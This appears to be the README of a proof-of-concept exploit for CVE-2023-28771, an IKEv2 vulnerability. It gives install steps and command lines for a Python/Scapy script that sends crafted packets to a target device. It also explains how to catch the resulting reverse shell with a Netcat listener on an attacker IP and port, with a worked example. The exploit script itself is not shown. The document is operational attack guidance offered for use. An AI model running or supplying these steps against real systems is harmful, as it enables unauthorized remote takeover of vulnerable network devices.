PoC for CVE-2023-28771
This script sends custom IKEv2 packets to devices vulnerable to CVE-2023-28771, for testing and exploration of the IKEv2 protocol, based on Rapid7's exploitation techniques.
Prerequisites
- Python 3.x
- Scapy library
Installation
- Clone the repository or download the script file.
- Install the required dependencies by running the following command:
pip install scapy
Usage
To send a custom IKEv2 packet, use the following command:
python3 PoC-CVE-2023-28771.py -t <target_ip> -l <attacker_ip> -lp <attacker_port>
Replace <target_ip> with the IP address of the target system, <attacker_ip> with the IP address where you have Netcat running to receive the reverse shell, and <attacker_port> with the port number on which Netcat is listening.
For example, to send a custom IKEv2 packet to a target system with IP address 192.168.1.100 and establish a reverse shell to the attacker's IP 192.168.130.12 on port 3322, run the following command:
python3 PoC-CVE-2023-28771.py -t 192.168.1.100 -l 192.168.130.12 -lp 3322
Make sure you have Netcat listening on the specified IP address and port to receive the reverse shell. Note: the script may require administrative privileges to send and receive network packets (run it with sudo!).